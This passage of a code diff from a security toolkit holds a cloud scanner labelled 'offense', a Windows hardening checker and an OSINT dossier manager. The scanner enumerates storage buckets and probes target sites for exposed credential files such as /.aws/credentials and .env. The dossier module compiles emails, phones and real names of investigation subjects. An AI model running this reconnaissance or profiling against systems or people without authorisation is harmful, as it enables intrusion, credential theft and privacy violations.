except ValueError:
self.print_status("Invalid token value", "error")
else:
self.print_status(f"Current max tokens: {self.tokens_override or 'default'}", "info")
elif cmd == '/stream':
self.streaming = not self.streaming
self.print_status(f"Streaming {'enabled' if self.streaming else 'disabled'}", "success")
elif cmd in ['/exit', '/quit', '/q']:
return False
else:
self.print_status(f"Unknown command: {cmd}. Type /help for commands.", "warning")
return True
def chat_loop(self):
"""Main chat loop."""
print(f"\n{Colors.GREEN}[+] Chat started. Type /help for commands, /exit to quit.{Colors.RESET}")
print(f"{Colors.DIM}{'' * 60}{Colors.RESET}\n")
while True:
try:
# Get user input
user_input = input(f"{Colors.GREEN}You:{Colors.RESET} ").strip()
if not user_input:
continue
# Handle commands
if user_input.startswith('/'):
if not self.handle_command(user_input):
break
continue
# Generate response
print(f"\n{Colors.CYAN}AUTARCH:{Colors.RESET} ", end="", flush=True)
kwargs = {}
if self.temp_override is not None:
kwargs['temperature'] = self.temp_override
if self.tokens_override is not None:
kwargs['max_tokens'] = self.tokens_override
try:
if self.streaming:
# Streaming response
for token in self.llm.chat(
user_input,
system_prompt=self.system_prompt,
stream=True,
**kwargs
):
print(token, end="", flush=True)
print("\n")
else:
# Non-streaming response
response = self.llm.chat(
user_input,
system_prompt=self.system_prompt,
stream=False,
**kwargs
)
print(f"{response}\n")
except LLMError as e:
print()
self.print_status(f"Generation error: {e}", "error")
except (EOFError, KeyboardInterrupt):
print(f"\n\n{Colors.CYAN}Chat ended.{Colors.RESET}")
break
def run(self):
"""Run the chat interface."""
clear_screen()
display_banner()
print(f"{Colors.BOLD}{Colors.WHITE} AUTARCH Chat Interface{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
# Check if model is loaded
if not self.llm.is_loaded:
self.print_status("Loading model...", "info")
try:
self.llm.load_model(verbose=True)
except LLMError as e:
self.print_status(f"Failed to load model: {e}", "error")
self.print_status("Please run setup to configure a model.", "warning")
return
self.print_model_info()
self.chat_loop()
def run():
"""Module entry point."""
chat = ChatInterface()
chat.run()
if __name__ == "__main__":
run()

448
modules/cloud_scan.py Normal file
View File

@@ -0,0 +1,448 @@
"""AUTARCH Cloud Security Scanner
AWS/Azure/GCP bucket enumeration, IAM misconfiguration detection, exposed
service scanning, and cloud resource discovery.
"""
DESCRIPTION = "Cloud infrastructure security scanning"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import threading
from pathlib import Path
from typing import Dict, List, Optional, Any
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
# ── Cloud Provider Endpoints ─────────────────────────────────────────────────
AWS_REGIONS = [
'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2',
'eu-west-1', 'eu-west-2', 'eu-central-1',
'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1',
]
COMMON_BUCKET_NAMES = [
'backup', 'backups', 'data', 'dev', 'staging', 'prod', 'production',
'logs', 'assets', 'media', 'uploads', 'images', 'static', 'public',
'private', 'internal', 'config', 'configs', 'db', 'database',
'archive', 'old', 'temp', 'tmp', 'test', 'debug', 'admin',
'www', 'web', 'api', 'app', 'mobile', 'docs', 'documents',
'reports', 'export', 'import', 'share', 'shared',
]
METADATA_ENDPOINTS = {
'aws': 'http://169.254.169.254/latest/meta-data/',
'gcp': 'http://metadata.google.internal/computeMetadata/v1/',
'azure': 'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
'digitalocean': 'http://169.254.169.254/metadata/v1/',
}
# ── Cloud Scanner ────────────────────────────────────────────────────────────
class CloudScanner:
"""Cloud infrastructure security scanner."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'cloud_scan')
os.makedirs(self.data_dir, exist_ok=True)
self.results: List[Dict] = []
self._jobs: Dict[str, Dict] = {}
# ── S3 Bucket Enumeration ────────────────────────────────────────────
def enum_s3_buckets(self, keyword: str, prefixes: List[str] = None,
suffixes: List[str] = None) -> str:
"""Enumerate S3 buckets with naming permutations. Returns job_id."""
if not HAS_REQUESTS:
return ''
job_id = f's3enum_{int(time.time())}'
self._jobs[job_id] = {
'type': 's3_enum', 'status': 'running',
'found': [], 'checked': 0, 'total': 0
}
def _enum():
prefixes_list = prefixes or ['', 'dev-', 'staging-', 'prod-', 'test-', 'backup-']
suffixes_list = suffixes or ['', '-backup', '-data', '-assets', '-logs', '-dev',
'-staging', '-prod', '-public', '-private']
bucket_names = set()
for pfx in prefixes_list:
for sfx in suffixes_list:
bucket_names.add(f'{pfx}{keyword}{sfx}')
# Add common patterns
for common in COMMON_BUCKET_NAMES:
bucket_names.add(f'{keyword}-{common}')
bucket_names.add(f'{common}-{keyword}')
self._jobs[job_id]['total'] = len(bucket_names)
found = []
for name in bucket_names:
try:
# Check S3 bucket
url = f'https://{name}.s3.amazonaws.com'
resp = requests.head(url, timeout=5, allow_redirects=True)
self._jobs[job_id]['checked'] += 1
if resp.status_code == 200:
# Try listing
list_resp = requests.get(url, timeout=5)
listable = '<ListBucketResult' in list_resp.text
found.append({
'bucket': name, 'provider': 'aws',
'url': url, 'status': resp.status_code,
'listable': listable, 'public': True
})
elif resp.status_code == 403:
found.append({
'bucket': name, 'provider': 'aws',
'url': url, 'status': 403,
'listable': False, 'public': False,
'exists': True
})
except Exception:
self._jobs[job_id]['checked'] += 1
self._jobs[job_id]['found'] = found
self._jobs[job_id]['status'] = 'complete'
threading.Thread(target=_enum, daemon=True).start()
return job_id
# ── GCS Bucket Enumeration ───────────────────────────────────────────
def enum_gcs_buckets(self, keyword: str) -> str:
"""Enumerate Google Cloud Storage buckets. Returns job_id."""
if not HAS_REQUESTS:
return ''
job_id = f'gcsenum_{int(time.time())}'
self._jobs[job_id] = {
'type': 'gcs_enum', 'status': 'running',
'found': [], 'checked': 0, 'total': 0
}
def _enum():
names = set()
for suffix in ['', '-data', '-backup', '-assets', '-staging', '-prod', '-dev', '-logs']:
names.add(f'{keyword}{suffix}')
self._jobs[job_id]['total'] = len(names)
found = []
for name in names:
try:
url = f'https://storage.googleapis.com/{name}'
resp = requests.head(url, timeout=5)
self._jobs[job_id]['checked'] += 1
if resp.status_code in (200, 403):
found.append({
'bucket': name, 'provider': 'gcp',
'url': url, 'status': resp.status_code,
'public': resp.status_code == 200
})
except Exception:
self._jobs[job_id]['checked'] += 1
self._jobs[job_id]['found'] = found
self._jobs[job_id]['status'] = 'complete'
threading.Thread(target=_enum, daemon=True).start()
return job_id
# ── Azure Blob Enumeration ───────────────────────────────────────────
def enum_azure_blobs(self, keyword: str) -> str:
"""Enumerate Azure Blob Storage containers. Returns job_id."""
if not HAS_REQUESTS:
return ''
job_id = f'azureenum_{int(time.time())}'
self._jobs[job_id] = {
'type': 'azure_enum', 'status': 'running',
'found': [], 'checked': 0, 'total': 0
}
def _enum():
# Storage account names
accounts = [keyword, f'{keyword}storage', f'{keyword}data',
f'{keyword}backup', f'{keyword}dev', f'{keyword}prod']
containers = ['$web', 'data', 'backup', 'uploads', 'assets',
'logs', 'public', 'media', 'images']
total = len(accounts) * len(containers)
self._jobs[job_id]['total'] = total
found = []
for account in accounts:
for container in containers:
try:
url = f'https://{account}.blob.core.windows.net/{container}?restype=container&comp=list'
resp = requests.get(url, timeout=5)
self._jobs[job_id]['checked'] += 1
if resp.status_code == 200:
found.append({
'account': account, 'container': container,
'provider': 'azure', 'url': url,
'status': resp.status_code, 'public': True
})
elif resp.status_code == 403:
found.append({
'account': account, 'container': container,
'provider': 'azure', 'url': url,
'status': 403, 'exists': True, 'public': False
})
except Exception:
self._jobs[job_id]['checked'] += 1
self._jobs[job_id]['found'] = found
self._jobs[job_id]['status'] = 'complete'
threading.Thread(target=_enum, daemon=True).start()
return job_id
# ── Exposed Services ─────────────────────────────────────────────────
def scan_exposed_services(self, target: str) -> Dict:
"""Check for commonly exposed cloud services on a target."""
if not HAS_REQUESTS:
return {'ok': False, 'error': 'requests not available'}
services = []
checks = [
('/server-status', 'Apache Status'),
('/nginx_status', 'Nginx Status'),
('/.env', 'Environment File'),
('/.git/config', 'Git Config'),
('/.aws/credentials', 'AWS Credentials'),
('/wp-config.php.bak', 'WordPress Config Backup'),
('/phpinfo.php', 'PHP Info'),
('/debug', 'Debug Endpoint'),
('/actuator', 'Spring Actuator'),
('/actuator/env', 'Spring Env'),
('/api/swagger.json', 'Swagger/OpenAPI Spec'),
('/.well-known/security.txt', 'Security Policy'),
('/robots.txt', 'Robots.txt'),
('/sitemap.xml', 'Sitemap'),
('/graphql', 'GraphQL Endpoint'),
('/console', 'Console'),
('/admin', 'Admin Panel'),
('/wp-admin', 'WordPress Admin'),
('/phpmyadmin', 'phpMyAdmin'),
]
for path, name in checks:
try:
url = f'{target.rstrip("/")}{path}'
resp = requests.get(url, timeout=5, allow_redirects=False)
if resp.status_code == 200:
# Check content for sensitive data
sensitive = False
body = resp.text[:2000].lower()
sensitive_indicators = [
'password', 'secret', 'access_key', 'private_key',
'database', 'db_host', 'smtp_pass', 'api_key'
]
if any(ind in body for ind in sensitive_indicators):
sensitive = True
services.append({
'path': path, 'name': name,
'url': url, 'status': resp.status_code,
'size': len(resp.content),
'sensitive': sensitive,
'content_type': resp.headers.get('content-type', '')
})
except Exception:
pass
return {
'ok': True,
'target': target,
'services': services,
'count': len(services)
}
# ── Metadata SSRF Check ──────────────────────────────────────────────
def check_metadata_access(self) -> Dict:
"""Check if cloud metadata service is accessible (SSRF indicator)."""
results = {}
for provider, url in METADATA_ENDPOINTS.items():
try:
headers = {}
if provider == 'gcp':
headers['Metadata-Flavor'] = 'Google'
resp = requests.get(url, headers=headers, timeout=3)
results[provider] = {
'accessible': resp.status_code == 200,
'status': resp.status_code,
'content_preview': resp.text[:200] if resp.status_code == 200 else ''
}
except Exception:
results[provider] = {'accessible': False, 'error': 'Connection failed'}
return {'ok': True, 'metadata': results}
# ── Subdomain / DNS Enumeration for Cloud ────────────────────────────
def enum_cloud_subdomains(self, domain: str) -> Dict:
"""Check for cloud-specific subdomains."""
if not HAS_REQUESTS:
return {'ok': False, 'error': 'requests not available'}
cloud_prefixes = [
'aws', 's3', 'ec2', 'lambda', 'api', 'cdn',
'azure', 'blob', 'cloud', 'gcp', 'storage',
'dev', 'staging', 'prod', 'admin', 'internal',
'vpn', 'mail', 'smtp', 'imap', 'ftp', 'ssh',
'db', 'database', 'redis', 'elastic', 'kibana',
'grafana', 'prometheus', 'jenkins', 'gitlab', 'docker',
'k8s', 'kubernetes', 'consul', 'vault', 'traefik',
]
found = []
import socket
for prefix in cloud_prefixes:
subdomain = f'{prefix}.{domain}'
try:
ip = socket.gethostbyname(subdomain)
found.append({
'subdomain': subdomain,
'ip': ip,
'cloud_hint': self._identify_cloud_ip(ip)
})
except socket.gaierror:
pass
return {'ok': True, 'domain': domain, 'subdomains': found, 'count': len(found)}
def _identify_cloud_ip(self, ip: str) -> str:
"""Try to identify cloud provider from IP."""
# Rough range checks
octets = ip.split('.')
if len(octets) == 4:
first = int(octets[0])
if first in (3, 18, 52, 54, 35):
return 'AWS'
elif first in (20, 40, 52, 104, 13):
return 'Azure'
elif first in (34, 35, 104, 142):
return 'GCP'
return 'Unknown'
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
return self._jobs.get(job_id)
def list_jobs(self) -> List[Dict]:
return [{'id': k, **v} for k, v in self._jobs.items()]
# ── Save Results ─────────────────────────────────────────────────────
def save_results(self, name: str, results: Dict) -> Dict:
"""Save scan results."""
filepath = os.path.join(self.data_dir, f'{name}.json')
with open(filepath, 'w') as f:
json.dump(results, f, indent=2)
return {'ok': True, 'path': filepath}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_cloud_scanner() -> CloudScanner:
global _instance
if _instance is None:
_instance = CloudScanner()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Cloud Security module."""
if not HAS_REQUESTS:
print(" Error: requests library required")
return
scanner = get_cloud_scanner()
while True:
print(f"\n{'='*60}")
print(f" Cloud Security Scanner")
print(f"{'='*60}")
print()
print(" 1 — Enumerate S3 Buckets (AWS)")
print(" 2 — Enumerate GCS Buckets (Google)")
print(" 3 — Enumerate Azure Blobs")
print(" 4 — Scan Exposed Services")
print(" 5 — Check Metadata Access (SSRF)")
print(" 6 — Cloud Subdomain Enum")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
kw = input(" Target keyword: ").strip()
if kw:
job_id = scanner.enum_s3_buckets(kw)
print(f" Scanning... (job: {job_id})")
while True:
job = scanner.get_job(job_id)
if job['status'] == 'complete':
for b in job['found']:
status = 'PUBLIC+LISTABLE' if b.get('listable') else \
('PUBLIC' if b.get('public') else 'EXISTS')
print(f" [{status}] {b['bucket']}")
if not job['found']:
print(" No buckets found")
break
time.sleep(1)
elif choice == '4':
target = input(" Target URL: ").strip()
if target:
result = scanner.scan_exposed_services(target)
for s in result['services']:
flag = ' [SENSITIVE]' if s.get('sensitive') else ''
print(f" {s['path']}: {s['name']}{flag}")
elif choice == '5':
result = scanner.check_metadata_access()
for provider, info in result['metadata'].items():
status = 'ACCESSIBLE' if info.get('accessible') else 'blocked'
print(f" {provider}: {status}")
elif choice == '6':
domain = input(" Target domain: ").strip()
if domain:
result = scanner.enum_cloud_subdomains(domain)
for s in result['subdomains']:
print(f" {s['subdomain']}{s['ip']} ({s['cloud_hint']})")

1482
modules/container_sec.py Normal file

File diff suppressed because it is too large Load Diff

1027
modules/counter.py Normal file

File diff suppressed because it is too large Load Diff

1287
modules/deauth.py Normal file

File diff suppressed because it is too large Load Diff

1061
modules/defender.py Normal file

File diff suppressed because it is too large Load Diff

1162
modules/defender_monitor.py Normal file

File diff suppressed because it is too large Load Diff

372
modules/defender_windows.py Normal file
View File

@@ -0,0 +1,372 @@
"""
AUTARCH Windows Defender Module
Windows-native security posture assessment
Checks Windows system configuration for security best practices.
"""
import os
import sys
import subprocess
import re
import json
from pathlib import Path
from datetime import datetime
sys.path.insert(0, str(Path(__file__).parent.parent))
# Module metadata
DESCRIPTION = "Windows system hardening & security checks"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
class WindowsDefender:
"""Windows security checker."""
def __init__(self):
self.results = []
def check(self, name: str, passed: bool, details: str = ""):
"""Record a check result."""
self.results.append({"name": name, "passed": passed, "details": details})
def run_cmd(self, cmd: str, timeout=15) -> tuple:
"""Run command and return (success, output)."""
try:
result = subprocess.run(cmd, shell=True, capture_output=True,
text=True, timeout=timeout)
return result.returncode == 0, result.stdout.strip()
except Exception:
return False, ""
def run_ps(self, ps_command: str, timeout=15) -> tuple:
"""Run a PowerShell command and return (success, output)."""
cmd = f'powershell -NoProfile -ExecutionPolicy Bypass -Command "{ps_command}"'
return self.run_cmd(cmd, timeout=timeout)
# ==================== SECURITY CHECKS ====================
def check_firewall(self):
"""Check Windows Firewall status for all profiles."""
success, output = self.run_cmd("netsh advfirewall show allprofiles state")
if success:
profiles_on = output.lower().count("on")
profiles_off = output.lower().count("off")
if profiles_off > 0:
self.check("Windows Firewall", False,
f"{profiles_off} profile(s) disabled")
else:
self.check("Windows Firewall", True,
f"All {profiles_on} profiles enabled")
else:
self.check("Windows Firewall", False, "Could not query firewall state")
def check_ssh_config(self):
"""Check Windows OpenSSH configuration."""
success, output = self.run_ps(
"Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH.Server*' "
"| Select-Object -ExpandProperty State"
)
if not success or "Installed" not in output:
self.check("SSH Config", True, "OpenSSH Server not installed (good)")
return
sshd_config = Path(os.environ.get('ProgramData', 'C:\\ProgramData')) / 'ssh' / 'sshd_config'
if not sshd_config.exists():
self.check("SSH Config", False, "OpenSSH installed but sshd_config not found")
return
content = sshd_config.read_text(errors='ignore')
if "PermitRootLogin no" in content or "PermitRootLogin prohibit-password" in content:
self.check("SSH Root Login Disabled", True)
else:
self.check("SSH Root Login Disabled", False, "Root login may be enabled")
if "PasswordAuthentication no" in content:
self.check("SSH Password Auth Disabled", True)
else:
self.check("SSH Password Auth Disabled", False,
"Consider using key-based auth only")
def check_open_ports(self):
"""Check for high-risk listening ports on Windows."""
success, output = self.run_ps(
"Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue "
"| Select-Object LocalPort, OwningProcess | Format-Table -AutoSize"
)
if not success:
success, output = self.run_cmd("netstat -ano | findstr LISTENING")
if success:
high_risk = []
if ':23 ' in output or '\t23\t' in output:
high_risk.append("23 (Telnet)")
if ':21 ' in output or '\t21\t' in output:
high_risk.append("21 (FTP)")
if ':3389 ' in output or '\t3389\t' in output:
high_risk.append("3389 (RDP)")
if ':445 ' in output or '\t445\t' in output:
high_risk.append("445 (SMB)")
if ':135 ' in output or '\t135\t' in output:
high_risk.append("135 (RPC)")
lines = [l for l in output.split('\n') if l.strip()]
if high_risk:
self.check("High-Risk Ports", False,
f"Open: {', '.join(high_risk)}")
else:
self.check("High-Risk Ports", True,
f"{len(lines)} services listening, no high-risk ports")
else:
self.check("High-Risk Ports", True, "Could not enumerate ports")
def check_updates(self):
"""Check Windows update status."""
success, output = self.run_ps(
"Get-HotFix | Sort-Object InstalledOn -Descending "
"| Select-Object -First 1 -ExpandProperty InstalledOn"
)
if success and output.strip():
self.check("System Updates", True,
f"Last update installed: {output.strip()}")
else:
success, output = self.run_ps("(Get-HotFix).Count")
if success and output.strip():
self.check("System Updates", True,
f"{output.strip()} hotfixes installed")
else:
self.check("System Updates", False, "Could not query update status")
def check_users(self):
"""Check Windows user security."""
# Admin accounts
success, output = self.run_ps(
"Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue "
"| Select-Object -ExpandProperty Name"
)
if success:
admins = [u.strip() for u in output.split('\n') if u.strip()]
self.check("Admin Accounts", len(admins) <= 2,
f"Admin users: {', '.join(admins)}")
# Enabled accounts with no password required
success, output = self.run_ps(
"Get-LocalUser | Where-Object {$_.Enabled -eq $true -and $_.PasswordRequired -eq $false} "
"| Select-Object -ExpandProperty Name"
)
if success:
no_pw = [u.strip() for u in output.split('\n') if u.strip()]
self.check("Password Required", len(no_pw) == 0,
f"No password required: {', '.join(no_pw)}" if no_pw else "All accounts require passwords")
# Guest account
success, output = self.run_ps("(Get-LocalUser -Name 'Guest' -ErrorAction SilentlyContinue).Enabled")
if success:
guest_enabled = output.strip().lower() == 'true'
self.check("Guest Account Disabled", not guest_enabled,
"Guest account is enabled" if guest_enabled else "Guest account disabled")
def check_permissions(self):
"""Check critical Windows file/folder permissions."""
critical_paths = [
(os.environ.get('SystemRoot', 'C:\\Windows') + '\\System32\\config', "SAM Registry Hive"),
(os.environ.get('ProgramData', 'C:\\ProgramData') + '\\ssh', "SSH Config Dir"),
]
for filepath, label in critical_paths:
if os.path.exists(filepath):
success, output = self.run_cmd(f'icacls "{filepath}"')
if success:
has_everyone_full = 'Everyone:(F)' in output or 'Everyone:(OI)(CI)(F)' in output
self.check(f"Permissions: {label}", not has_everyone_full,
f"Everyone has Full Control on {filepath}" if has_everyone_full else "Restricted")
def check_services(self):
"""Check for dangerous or unnecessary Windows services."""
dangerous = {
"RemoteRegistry": "Remote Registry",
"TlntSvr": "Telnet Server",
"SNMP": "SNMP Service",
"W3SVC": "IIS Web Server",
"FTPSVC": "FTP Server",
"SharedAccess": "Internet Connection Sharing",
}
running = []
for svc_name, label in dangerous.items():
success, output = self.run_ps(
f"(Get-Service -Name '{svc_name}' -ErrorAction SilentlyContinue).Status"
)
if success and 'Running' in output:
running.append(label)
self.check("Dangerous Services", len(running) == 0,
f"Running: {', '.join(running)}" if running else "No dangerous services running")
def check_defender(self):
"""Check Windows Defender antivirus status."""
success, output = self.run_ps(
"Get-MpComputerStatus -ErrorAction SilentlyContinue "
"| Select-Object AntivirusEnabled, RealTimeProtectionEnabled, "
"AntivirusSignatureLastUpdated | Format-List"
)
if success:
av_on = re.search(r'AntivirusEnabled\s*:\s*True', output)
rt_on = re.search(r'RealTimeProtectionEnabled\s*:\s*True', output)
if av_on and rt_on:
sig_match = re.search(r'AntivirusSignatureLastUpdated\s*:\s*(.+)', output)
sig_date = sig_match.group(1).strip() if sig_match else "Unknown"
self.check("Windows Defender", True,
f"AV enabled, real-time protection on. Signatures: {sig_date}")
elif av_on:
self.check("Windows Defender", False,
"AV enabled but real-time protection is OFF")
else:
self.check("Windows Defender", False, "Windows Defender is disabled")
else:
self.check("Windows Defender", False, "Could not query Defender status")
def check_uac(self):
"""Check UAC (User Account Control) status."""
success, output = self.run_ps(
"(Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' "
"-Name EnableLUA -ErrorAction SilentlyContinue).EnableLUA"
)
if success:
enabled = output.strip() == '1'
self.check("UAC Enabled", enabled,
"UAC is enabled" if enabled else "UAC is DISABLED — critical security risk")
success, output = self.run_ps(
"(Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' "
"-Name ConsentPromptBehaviorAdmin -ErrorAction SilentlyContinue).ConsentPromptBehaviorAdmin"
)
if success and output.strip().isdigit():
level = int(output.strip())
level_names = {
0: "Never notify (DANGEROUS)",
1: "Prompt on secure desktop (no dimming)",
2: "Prompt on secure desktop",
3: "Prompt for credentials",
4: "Prompt for consent",
5: "Prompt for consent (default)"
}
desc = level_names.get(level, f"Unknown level: {level}")
self.check("UAC Prompt Level", level >= 2, desc)
# ==================== FIREWALL MANAGEMENT ====================
def get_firewall_rules(self):
"""Get all Windows Firewall inbound rules."""
success, output = self.run_cmd(
"netsh advfirewall firewall show rule name=all dir=in"
)
return success, output
def block_ip(self, ip):
"""Block an IP via Windows Firewall."""
rule_name = f"AUTARCH_Block_{ip}"
success, output = self.run_cmd(
f'netsh advfirewall firewall add rule name="{rule_name}" '
f'dir=in action=block remoteip={ip}'
)
return success, f"Blocked {ip}" if success else f"Failed to block {ip} (need admin privileges)"
def unblock_ip(self, ip):
"""Unblock an IP via Windows Firewall."""
rule_name = f"AUTARCH_Block_{ip}"
success, output = self.run_cmd(
f'netsh advfirewall firewall delete rule name="{rule_name}"'
)
return success, f"Unblocked {ip}" if success else f"Failed to unblock {ip}"
# ==================== EVENT LOG ANALYSIS ====================
def analyze_event_logs(self):
"""Analyze Windows Security and System event logs."""
# Failed logins (Event ID 4625)
success, output = self.run_ps(
"Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} "
"-MaxEvents 500 -ErrorAction SilentlyContinue | "
"Select-Object TimeCreated, @{N='IP';E={$_.Properties[19].Value}}, "
"@{N='User';E={$_.Properties[5].Value}} | "
"Group-Object IP | Sort-Object Count -Descending | "
"Select-Object Count, Name, @{N='Users';E={($_.Group.User | Select-Object -Unique) -join ','}} | "
"ConvertTo-Json"
)
auth_results = []
if success and output.strip():
try:
data = json.loads(output)
if isinstance(data, dict):
data = [data]
for entry in data:
auth_results.append({
'ip': entry.get('Name', 'Unknown'),
'count': entry.get('Count', 0),
'usernames': (entry.get('Users', '') or '').split(','),
})
except json.JSONDecodeError:
pass
# System warnings/errors
success, output = self.run_ps(
"Get-WinEvent -FilterHashtable @{LogName='System'; Level=1,2,3} "
"-MaxEvents 50 -ErrorAction SilentlyContinue | "
"Select-Object TimeCreated, Id, LevelDisplayName, Message | "
"ConvertTo-Json"
)
system_results = []
if success and output.strip():
try:
data = json.loads(output)
if isinstance(data, dict):
data = [data]
for entry in data[:20]:
system_results.append({
'type': entry.get('LevelDisplayName', 'Warning'),
'id': entry.get('Id', 0),
'time': str(entry.get('TimeCreated', '')),
'detail': (entry.get('Message', '') or '')[:200],
'severity': 'HIGH' if entry.get('LevelDisplayName') in ('Critical', 'Error') else 'MEDIUM',
})
except json.JSONDecodeError:
pass
return auth_results, system_results
# ==================== CLI MENU ====================
def run():
"""CLI entry point."""
from core.banner import Colors, clear_screen, display_banner
clear_screen()
display_banner()
print(f"\n{Colors.BOLD}{Colors.BLUE}Windows System Defense{Colors.RESET}\n")
d = WindowsDefender()
print(f"{Colors.CYAN}Running Windows security audit...{Colors.RESET}\n")
d.check_firewall()
d.check_ssh_config()
d.check_open_ports()
d.check_updates()
d.check_users()
d.check_permissions()
d.check_services()
d.check_defender()
d.check_uac()
passed = sum(1 for r in d.results if r['passed'])
total = len(d.results)
score = int((passed / total) * 100) if total > 0 else 0
print(f"\n{'=' * 50}")
color = Colors.GREEN if score >= 80 else Colors.YELLOW if score >= 50 else Colors.RED
print(f"{color}Security Score: {score}% ({passed}/{total} checks passed){Colors.RESET}")
print(f"{'=' * 50}\n")
input("Press Enter to continue...")

803
modules/dossier.py Normal file
View File

@@ -0,0 +1,803 @@
"""
AUTARCH Dossier Module
Manage and correlate OSINT investigation data
Create dossiers to associate related OSINT findings like email searches,
username scans, phone lookups, and custom notes.
"""
import os
import sys
import json
import glob
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional
# Module metadata
NAME = "Dossier"
DESCRIPTION = "Manage OSINT investigation dossiers"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class DossierManager:
"""Manage OSINT investigation dossiers."""
def __init__(self):
from core.paths import get_dossiers_dir
self.dossier_dir = get_dossiers_dir()
self.dossier_dir.mkdir(exist_ok=True)
self.current_dossier = None
self.current_dossier_path = None
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
# ==================== DOSSIER OPERATIONS ====================
def _generate_dossier_id(self, name: str) -> str:
"""Generate a unique dossier ID from name."""
# Sanitize name for filename
safe_name = "".join(c if c.isalnum() or c in "-_" else "_" for c in name.lower())
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
return f"{safe_name}_{timestamp}"
def _get_dossier_path(self, dossier_id: str) -> Path:
"""Get path to dossier file."""
return self.dossier_dir / f"{dossier_id}.json"
def _create_empty_dossier(self, name: str, subject: str = "", notes: str = "") -> Dict:
"""Create a new empty dossier structure."""
return {
"meta": {
"name": name,
"subject": subject,
"created": datetime.now().isoformat(),
"modified": datetime.now().isoformat(),
"notes": notes,
},
"identifiers": {
"emails": [],
"usernames": [],
"phones": [],
"real_names": [],
"aliases": [],
},
"results": {
"email_searches": [],
"username_searches": [],
"phone_searches": [],
},
"profiles": [],
"custom_notes": [],
}
def save_dossier(self, dossier: Dict, path: Path) -> bool:
"""Save dossier to file."""
try:
dossier["meta"]["modified"] = datetime.now().isoformat()
with open(path, 'w') as f:
json.dump(dossier, f, indent=2)
return True
except Exception as e:
self.print_status(f"Failed to save dossier: {e}", "error")
return False
def load_dossier(self, path: Path) -> Optional[Dict]:
"""Load dossier from file."""
try:
with open(path, 'r') as f:
return json.load(f)
except Exception as e:
self.print_status(f"Failed to load dossier: {e}", "error")
return None
def list_dossiers(self) -> List[Dict]:
"""List all saved dossiers."""
dossiers = []
for file in self.dossier_dir.glob("*.json"):
try:
with open(file, 'r') as f:
data = json.load(f)
dossiers.append({
"path": file,
"id": file.stem,
"name": data.get("meta", {}).get("name", "Unknown"),
"subject": data.get("meta", {}).get("subject", ""),
"created": data.get("meta", {}).get("created", ""),
"modified": data.get("meta", {}).get("modified", ""),
"profiles_count": len(data.get("profiles", [])),
"identifiers_count": sum(len(v) for v in data.get("identifiers", {}).values()),
})
except:
continue
return sorted(dossiers, key=lambda x: x.get("modified", ""), reverse=True)
# ==================== UI METHODS ====================
def create_new_dossier(self):
"""Interactive dossier creation."""
print(f"\n{Colors.BOLD}Create New Dossier{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
name = input(f"{Colors.WHITE}Dossier name: {Colors.RESET}").strip()
if not name:
self.print_status("Dossier name is required", "error")
return
subject = input(f"{Colors.WHITE}Subject (target name/identifier): {Colors.RESET}").strip()
notes = input(f"{Colors.WHITE}Initial notes (optional): {Colors.RESET}").strip()
# Create dossier
dossier_id = self._generate_dossier_id(name)
dossier_path = self._get_dossier_path(dossier_id)
dossier = self._create_empty_dossier(name, subject, notes)
# Prompt for initial identifiers
print(f"\n{Colors.CYAN}Add initial identifiers (press Enter to skip):{Colors.RESET}")
emails = input(f"{Colors.WHITE} Email(s) (comma-separated): {Colors.RESET}").strip()
if emails:
dossier["identifiers"]["emails"] = [e.strip() for e in emails.split(",") if e.strip()]
usernames = input(f"{Colors.WHITE} Username(s) (comma-separated): {Colors.RESET}").strip()
if usernames:
dossier["identifiers"]["usernames"] = [u.strip() for u in usernames.split(",") if u.strip()]
phones = input(f"{Colors.WHITE} Phone(s) (comma-separated): {Colors.RESET}").strip()
if phones:
dossier["identifiers"]["phones"] = [p.strip() for p in phones.split(",") if p.strip()]
real_names = input(f"{Colors.WHITE} Real name(s) (comma-separated): {Colors.RESET}").strip()
if real_names:
dossier["identifiers"]["real_names"] = [n.strip() for n in real_names.split(",") if n.strip()]
# Save dossier
if self.save_dossier(dossier, dossier_path):
self.print_status(f"Dossier created: {dossier_id}", "success")
self.current_dossier = dossier
self.current_dossier_path = dossier_path
# Ask if user wants to open it
open_now = input(f"\n{Colors.WHITE}Open dossier now? [{Colors.GREEN}y{Colors.WHITE}/{Colors.RED}n{Colors.WHITE}]: {Colors.RESET}").strip().lower()
if open_now == 'y':
self.view_dossier_detail(dossier, dossier_path)
def view_dossiers_list(self):
"""Display list of saved dossiers."""
